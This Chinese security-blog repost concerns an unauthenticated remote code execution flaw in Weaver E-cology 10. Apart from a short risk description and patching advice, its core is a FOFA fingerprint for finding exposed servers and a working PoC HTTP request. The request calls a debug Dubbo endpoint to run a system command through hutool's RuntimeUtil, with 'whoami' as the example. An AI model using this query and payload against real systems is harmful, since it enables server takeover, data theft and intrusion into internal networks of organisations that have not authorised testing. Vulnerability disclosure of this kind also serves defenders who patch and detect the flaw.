文章总结： 本文分析了泛微E-cology10系统存在的未授权远程代码执行漏洞。攻击者无需认证即可利用特定接口执行任意代码，导致服务器被控、数据泄露及内网渗透风险。文章提供了FOFA指纹识别语法及漏洞利用POC，建议用户及时修复漏洞、加强访问控制与日志审计以保障系统安全。 综合评分： 82 文章分类： 漏洞分析,漏洞POC,WEB安全,渗透测试

泛微 E-cology 10 未授权远程代码执行漏洞分析与安全风险解读

原创

zz zz

星络安全实验室

2026年3月24日 20:30 重庆

| | | — | | 免责声明:文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，未授权的攻击属于非法行为!文章中敏感信息均已做多层打码处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责作者不为此承担任何责任，一旦造成后果请自行负责 |

fofa语法

icon_hash="-1619753057"

泛微 E-cology 10 是一款面向中大型组织的数智化协同运营平台，定位为企业级数字化中枢，核心功能涵盖协同办公、流程管理、业务集成、知识管理以及低代码开发等多种业务场景，广泛应用于企业信息化建设中。

然而，安全研究表明，该系统存在严重的远程代码执行（RCE）漏洞。攻击者在无需身份认证的情况下，可通过向特定接口发送精心构造的恶意请求，在目标服务器上执行任意代码。

一旦漏洞被成功利用，可能带来以下安全风险：

• 服务器被完全控制，系统权限遭到接管
• 企业敏感数据（如业务数据、用户信息等）被窃取或篡改
• 系统被植入后门程序，形成长期潜伏风险
• 内网环境进一步被横向渗透，扩大攻击影响范围

该漏洞的存在对企业信息安全构成了严重威胁，建议相关用户及时关注官方安全公告，尽快进行漏洞修复与安全加固，同时加强访问控制与日志审计机制，以降低潜在风险。

POST /papi/esearch/data/devops/dubboApi/debug/method?interfaceName=cn.hutool.core.util.RuntimeUtil&methodName=execForStr HTTP/1.1Host: xxContent-Type: application/jsonConnection: closeSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin
[["whoami"]]

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：星络安全实验室 zz zz《泛微 E-cology 10 未授权远程代码执行漏洞分析与安全风险解读》